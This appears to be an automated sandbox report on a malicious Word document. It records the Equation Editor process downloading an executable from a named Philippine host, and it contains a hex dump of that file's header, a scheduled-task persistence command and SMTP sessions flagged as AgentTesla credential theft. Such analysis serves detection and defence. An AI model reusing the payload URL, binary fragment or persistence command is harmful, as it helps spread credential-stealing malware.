                                                                                      Apr 12, 2021 14:22:57.726500034 CEST4916780192.168.2.22203.167.7.88
                                                                                      Apr 12, 2021 14:22:57.726504087 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.726506948 CEST4916780192.168.2.22203.167.7.88
                                                                                      Apr 12, 2021 14:22:57.726537943 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.726550102 CEST4916780192.168.2.22203.167.7.88
                                                                                      Apr 12, 2021 14:22:57.726809978 CEST4916780192.168.2.22203.167.7.88
                                                                                      Apr 12, 2021 14:22:57.727689981 CEST4916780192.168.2.22203.167.7.88
                                                                                      Apr 12, 2021 14:22:57.854878902 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.854954958 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.855034113 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.855038881 CEST4916780192.168.2.22203.167.7.88
                                                                                      Apr 12, 2021 14:22:57.855071068 CEST4916780192.168.2.22203.167.7.88
                                                                                      Apr 12, 2021 14:22:57.855098009 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.855098963 CEST4916780192.168.2.22203.167.7.88
                                                                                      Apr 12, 2021 14:22:57.855163097 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.855216980 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.855267048 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.855312109 CEST4916780192.168.2.22203.167.7.88
                                                                                      Apr 12, 2021 14:22:57.855317116 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.855325937 CEST4916780192.168.2.22203.167.7.88
                                                                                      Apr 12, 2021 14:22:57.855331898 CEST4916780192.168.2.22203.167.7.88
                                                                                      Apr 12, 2021 14:22:57.855366945 CEST4916780192.168.2.22203.167.7.88
                                                                                      Apr 12, 2021 14:22:57.855367899 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.855418921 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.855473042 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.855514050 CEST4916780192.168.2.22203.167.7.88
                                                                                      Apr 12, 2021 14:22:57.855526924 CEST4916780192.168.2.22203.167.7.88
                                                                                      Apr 12, 2021 14:22:57.855535984 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.855586052 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.855637074 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.855679989 CEST4916780192.168.2.22203.167.7.88
                                                                                      Apr 12, 2021 14:22:57.855689049 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.855729103 CEST4916780192.168.2.22203.167.7.88
                                                                                      Apr 12, 2021 14:22:57.855739117 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.855765104 CEST4916780192.168.2.22203.167.7.88
                                                                                      Apr 12, 2021 14:22:57.855776072 CEST4916780192.168.2.22203.167.7.88
                                                                                      Apr 12, 2021 14:22:57.855789900 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.855811119 CEST4916780192.168.2.22203.167.7.88
                                                                                      Apr 12, 2021 14:22:57.855819941 CEST4916780192.168.2.22203.167.7.88
                                                                                      Apr 12, 2021 14:22:57.855840921 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.855866909 CEST4916780192.168.2.22203.167.7.88
                                                                                      Apr 12, 2021 14:22:57.855896950 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.855921984 CEST4916780192.168.2.22203.167.7.88
                                                                                      Apr 12, 2021 14:22:57.855947971 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.855999947 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.856031895 CEST4916780192.168.2.22203.167.7.88
                                                                                      Apr 12, 2021 14:22:57.856051922 CEST4916780192.168.2.22203.167.7.88
                                                                                      Apr 12, 2021 14:22:57.856057882 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.856101036 CEST4916780192.168.2.22203.167.7.88
                                                                                      Apr 12, 2021 14:22:57.856153965 CEST4916780192.168.2.22203.167.7.88
                                                                                      Apr 12, 2021 14:22:57.856704950 CEST4916780192.168.2.22203.167.7.88
                                                                                      Apr 12, 2021 14:22:57.986711979 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.986767054 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.986800909 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.986825943 CEST8049167203.167.7.88192.168.2.22
                                                                                      Apr 12, 2021 14:22:57.986860991 CEST8049167203.167.7.88192.168.2.22

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Apr 12, 2021 14:22:57.255395889 CEST5219753192.168.2.228.8.8.8
                                                                                      Apr 12, 2021 14:22:57.312652111 CEST53521978.8.8.8192.168.2.22
                                                                                      Apr 12, 2021 14:23:37.622607946 CEST5309953192.168.2.228.8.8.8
                                                                                      Apr 12, 2021 14:23:37.679516077 CEST53530998.8.8.8192.168.2.22
                                                                                      Apr 12, 2021 14:23:45.254225969 CEST5283853192.168.2.228.8.8.8
                                                                                      Apr 12, 2021 14:23:45.314045906 CEST53528388.8.8.8192.168.2.22
                                                                                      Apr 12, 2021 14:23:45.315026045 CEST5283853192.168.2.228.8.8.8
                                                                                      Apr 12, 2021 14:23:45.374996901 CEST53528388.8.8.8192.168.2.22
                                                                                      Apr 12, 2021 14:23:47.177695990 CEST6120053192.168.2.228.8.8.8
                                                                                      Apr 12, 2021 14:23:47.236190081 CEST53612008.8.8.8192.168.2.22
                                                                                      Apr 12, 2021 14:23:47.380472898 CEST4954853192.168.2.228.8.8.8
                                                                                      Apr 12, 2021 14:23:47.443227053 CEST53495488.8.8.8192.168.2.22
                                                                                      Apr 12, 2021 14:23:54.333218098 CEST5562753192.168.2.228.8.8.8
                                                                                      Apr 12, 2021 14:23:54.395222902 CEST53556278.8.8.8192.168.2.22
                                                                                      Apr 12, 2021 14:23:54.395848036 CEST5562753192.168.2.228.8.8.8
                                                                                      Apr 12, 2021 14:23:54.455004930 CEST53556278.8.8.8192.168.2.22
                                                                                      Apr 12, 2021 14:24:05.344419003 CEST5600953192.168.2.228.8.8.8
                                                                                      Apr 12, 2021 14:24:05.401247978 CEST53560098.8.8.8192.168.2.22
                                                                                      Apr 12, 2021 14:24:11.487760067 CEST6186553192.168.2.228.8.8.8
                                                                                      Apr 12, 2021 14:24:11.545258999 CEST53618658.8.8.8192.168.2.22
                                                                                      Apr 12, 2021 14:24:11.545697927 CEST6186553192.168.2.228.8.8.8
                                                                                      Apr 12, 2021 14:24:11.603570938 CEST53618658.8.8.8192.168.2.22

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                      Apr 12, 2021 14:22:57.255395889 CEST192.168.2.228.8.8.80xc6ccStandard query (0)rotronics.com.phA (IP address)IN (0x0001)
                                                                                      Apr 12, 2021 14:23:37.622607946 CEST192.168.2.228.8.8.80xd799Standard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                                      Apr 12, 2021 14:23:45.254225969 CEST192.168.2.228.8.8.80xbb0eStandard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                                      Apr 12, 2021 14:23:45.315026045 CEST192.168.2.228.8.8.80xbb0eStandard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                                      Apr 12, 2021 14:23:54.333218098 CEST192.168.2.228.8.8.80x44d7Standard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                                      Apr 12, 2021 14:23:54.395848036 CEST192.168.2.228.8.8.80x44d7Standard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                                      Apr 12, 2021 14:24:05.344419003 CEST192.168.2.228.8.8.80x8f63Standard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                                      Apr 12, 2021 14:24:11.487760067 CEST192.168.2.228.8.8.80x450dStandard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                                      Apr 12, 2021 14:24:11.545697927 CEST192.168.2.228.8.8.80x450dStandard query (0)mail.privateemail.comA (IP address)IN (0x0001)

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                      Apr 12, 2021 14:22:57.312652111 CEST8.8.8.8192.168.2.220xc6ccNo error (0)rotronics.com.ph203.167.7.88A (IP address)IN (0x0001)
                                                                                      Apr 12, 2021 14:23:37.679516077 CEST8.8.8.8192.168.2.220xd799No error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                                      Apr 12, 2021 14:23:45.314045906 CEST8.8.8.8192.168.2.220xbb0eNo error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                                      Apr 12, 2021 14:23:45.374996901 CEST8.8.8.8192.168.2.220xbb0eNo error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                                      Apr 12, 2021 14:23:54.395222902 CEST8.8.8.8192.168.2.220x44d7No error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                                      Apr 12, 2021 14:23:54.455004930 CEST8.8.8.8192.168.2.220x44d7No error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                                      Apr 12, 2021 14:24:05.401247978 CEST8.8.8.8192.168.2.220x8f63No error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                                      Apr 12, 2021 14:24:11.545258999 CEST8.8.8.8192.168.2.220x450dNo error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                                      Apr 12, 2021 14:24:11.603570938 CEST8.8.8.8192.168.2.220x450dNo error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)

                                                                                      HTTP Request Dependency Graph

                                                                                      • rotronics.com.ph

                                                                                      HTTP Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      0192.168.2.2249167203.167.7.8880C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Apr 12, 2021 14:22:57.464476109 CEST0OUTGET /docxxx/dec/ZhIOjFmINIXbKXm.exe HTTP/1.1
                                                                                      Accept: */*
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                      Host: rotronics.com.ph
                                                                                      Connection: Keep-Alive
                                                                                      Apr 12, 2021 14:22:57.597677946 CEST2INHTTP/1.1 200 OK
                                                                                      Date: Mon, 12 Apr 2021 12:22:58 GMT
                                                                                      Server: Apache
                                                                                      Last-Modified: Mon, 12 Apr 2021 05:14:50 GMT
                                                                                      Accept-Ranges: bytes
                                                                                      Content-Length: 733184
                                                                                      Vary: User-Agent
                                                                                      Keep-Alive: timeout=5, max=100
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-msdownload
                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 aa d6 73 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 e2 0a 00 00 4c 00 00 00 00 00 00 3e 00 0b 00 00 20 00 00 00 20 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ec ff 0a 00 4f 00 00 00 00 20 0b 00 e8 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 e0 0a 00 00 20 00 00 00 e2 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e8 48 00 00 00 20 0b 00 00 4a 00 00 00 e4 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0b 00 00 02 00 00 00 2e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 24 7d 00 00 18 76 00 00 03 00 00 00 01 00 00 06 3c f3 00 00 b0 0c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 1f 00 00 0a 28 20 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 21 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 22 00 00 0a 00 02 16 28 23 00 00 0a 00 02 17 28 24 00 00 0a 00 02 16 28 25 00 00 0a 00 02 16 28 26 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f ed 00 00 06 28 27 00 00 0a 00 2a 26 00 02 28 28 00 00 0a 00 2a ce 73 29 00 00 0a 80 01 00 00 04 73 2a 00 00 0a 80 02 00 00 04 73 2b 00 00 0a 80 03 00 00 04 73 2c 00 00 0a 80 04 00 00 04 73 2d 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2e 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 2f 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 30 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 31 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 32 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 33 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 34 00 00 0a 6f 35 00 00 0a 73 36 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00 04 0a 2b 00 06 2a 22 00 02 80 07 00 00 04 2a 13 30 03 00 26 00 00 00 08 00 00 11 00 28 0b 00 00 06 72 27 00 00 70 7e 07 00 00 04 6f 37 00 00 0a 28 38 00
                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELs`PL> @ @O H H.textD `.rsrcH J@@.reloc.@B H$}v<0(( (o!*("(#($(%(&*N(o('*&((*s)s*s+s,s-*0~o.+*0~o/+*0~o0+*0~o1+*0~o2+*0<~(3,!rp(4o5s6~+*0~+*"*0&(r'p~o7(8


                                                                                      SMTP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IPCommands
                                                                                      Apr 12, 2021 14:23:38.101613998 CEST58749168198.54.122.60192.168.2.22220 PrivateEmail.com Mail Node
                                                                                      Apr 12, 2021 14:23:38.102071047 CEST49168587192.168.2.22198.54.122.60EHLO 116938
                                                                                      Apr 12, 2021 14:23:38.297205925 CEST58749168198.54.122.60192.168.2.22250-MTA-05.privateemail.com
                                                                                      250-PIPELINING
                                                                                      250-SIZE 81788928
                                                                                      250-ETRN
                                                                                      250-AUTH PLAIN LOGIN
                                                                                      250-ENHANCEDSTATUSCODES
                                                                                      250-8BITMIME
                                                                                      250 STARTTLS
                                                                                      Apr 12, 2021 14:23:38.321805000 CEST49168587192.168.2.22198.54.122.60STARTTLS
                                                                                      Apr 12, 2021 14:23:38.516220093 CEST58749168198.54.122.60192.168.2.22220 Ready to start TLS
                                                                                      Apr 12, 2021 14:23:45.779499054 CEST58749169198.54.122.60192.168.2.22220 PrivateEmail.com Mail Node
                                                                                      Apr 12, 2021 14:23:45.779845953 CEST49169587192.168.2.22198.54.122.60EHLO 116938
                                                                                      Apr 12, 2021 14:23:45.978158951 CEST58749169198.54.122.60192.168.2.22250-MTA-05.privateemail.com
                                                                                      250-PIPELINING
                                                                                      250-SIZE 81788928
                                                                                      250-ETRN
                                                                                      250-AUTH PLAIN LOGIN
                                                                                      250-ENHANCEDSTATUSCODES
                                                                                      250-8BITMIME
                                                                                      250 STARTTLS
                                                                                      Apr 12, 2021 14:23:45.978430033 CEST49169587192.168.2.22198.54.122.60STARTTLS
                                                                                      Apr 12, 2021 14:23:46.176167965 CEST58749169198.54.122.60192.168.2.22220 Ready to start TLS
                                                                                      Apr 12, 2021 14:23:54.851526976 CEST58749171198.54.122.60192.168.2.22220 PrivateEmail.com Mail Node
                                                                                      Apr 12, 2021 14:23:54.851766109 CEST49171587192.168.2.22198.54.122.60EHLO 116938
                                                                                      Apr 12, 2021 14:23:55.047741890 CEST58749171198.54.122.60192.168.2.22250-MTA-05.privateemail.com
                                                                                      250-PIPELINING
                                                                                      250-SIZE 81788928
                                                                                      250-ETRN
                                                                                      250-AUTH PLAIN LOGIN
                                                                                      250-ENHANCEDSTATUSCODES
                                                                                      250-8BITMIME
                                                                                      250 STARTTLS
                                                                                      Apr 12, 2021 14:23:55.048083067 CEST49171587192.168.2.22198.54.122.60STARTTLS
                                                                                      Apr 12, 2021 14:23:55.244251966 CEST58749171198.54.122.60192.168.2.22220 Ready to start TLS
                                                                                      Apr 12, 2021 14:24:05.793168068 CEST58749172198.54.122.60192.168.2.22220 PrivateEmail.com Mail Node
                                                                                      Apr 12, 2021 14:24:05.793556929 CEST49172587192.168.2.22198.54.122.60EHLO 116938
                                                                                      Apr 12, 2021 14:24:05.988888979 CEST58749172198.54.122.60192.168.2.22250-MTA-05.privateemail.com
                                                                                      250-PIPELINING
                                                                                      250-SIZE 81788928
                                                                                      250-ETRN
                                                                                      250-AUTH PLAIN LOGIN
                                                                                      250-ENHANCEDSTATUSCODES
                                                                                      250-8BITMIME
                                                                                      250 STARTTLS
                                                                                      Apr 12, 2021 14:24:05.989166021 CEST49172587192.168.2.22198.54.122.60STARTTLS
                                                                                      Apr 12, 2021 14:24:06.182907104 CEST58749172198.54.122.60192.168.2.22220 Ready to start TLS
                                                                                      Apr 12, 2021 14:24:12.003307104 CEST58749173198.54.122.60192.168.2.22220 PrivateEmail.com Mail Node
                                                                                      Apr 12, 2021 14:24:12.003797054 CEST49173587192.168.2.22198.54.122.60EHLO 116938
                                                                                      Apr 12, 2021 14:24:12.204090118 CEST58749173198.54.122.60192.168.2.22250-MTA-05.privateemail.com
                                                                                      250-PIPELINING
                                                                                      250-SIZE 81788928
                                                                                      250-ETRN
                                                                                      250-AUTH PLAIN LOGIN
                                                                                      250-ENHANCEDSTATUSCODES
                                                                                      250-8BITMIME
                                                                                      250 STARTTLS
                                                                                      Apr 12, 2021 14:24:12.204479933 CEST49173587192.168.2.22198.54.122.60STARTTLS
                                                                                      Apr 12, 2021 14:24:12.404401064 CEST58749173198.54.122.60192.168.2.22220 Ready to start TLS

                                                                                      Code Manipulations

                                                                                      Statistics

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      Analysis Process: WINWORD.EXE PID: 1084 Parent PID: 584

                                                                                      General

                                                                                      Start time:14:22:36
                                                                                      Start date:12/04/2021
                                                                                      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                                                      Imagebase:0x13f480000
                                                                                      File size:1424032 bytes
                                                                                      MD5 hash:95C38D04597050285A18F66039EDB456
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Analysis Process: EQNEDT32.EXE PID: 2488 Parent PID: 584

                                                                                      General

                                                                                      Start time:14:22:37
                                                                                      Start date:12/04/2021
                                                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                      Imagebase:0x400000
                                                                                      File size:543304 bytes
                                                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Analysis Process: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe PID: 2492 Parent PID: 2488

                                                                                      General

                                                                                      Start time:14:22:39
                                                                                      Start date:12/04/2021
                                                                                      Path:C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
                                                                                      Imagebase:0x1360000
                                                                                      File size:733184 bytes
                                                                                      MD5 hash:F5F1E2A3E5DCE186EED0352350911887
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2097947633.00000000039FD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      Antivirus matches:
                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                      Reputation:low

                                                                                      Analysis Process: schtasks.exe PID: 2692 Parent PID: 2492

                                                                                      General

                                                                                      Start time:14:22:43
                                                                                      Start date:12/04/2021
                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\cAFIUeWyVQPJe' /XML 'C:\Users\user\AppData\Local\Temp\tmpBFD6.tmp'
                                                                                      Imagebase:0x340000
                                                                                      File size:179712 bytes
                                                                                      MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Analysis Process: rghbyjuyktyjrthbgvfsfhytrrgfsd.exe PID: 1980 Parent PID: 2492

                                                                                      General

                                                                                      Start time:14:22:44
                                                                                      Start date:12/04/2021
                                                                                      Path:C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
                                                                                      Imagebase:0x1360000
                                                                                      File size:733184 bytes
                                                                                      MD5 hash:F5F1E2A3E5DCE186EED0352350911887
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2350771035.0000000002BBE000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2349110341.0000000002821000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2349110341.0000000002821000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2347727555.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      Reputation:low

                                                                                      Analysis Process: EQNEDT32.EXE PID: 3024 Parent PID: 584

                                                                                      General

                                                                                      Start time:14:22:57
                                                                                      Start date:12/04/2021
                                                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                      Imagebase:0x400000
                                                                                      File size:543304 bytes
                                                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Disassembly

                                                                                      Code Analysis

                                                                                      Reset < >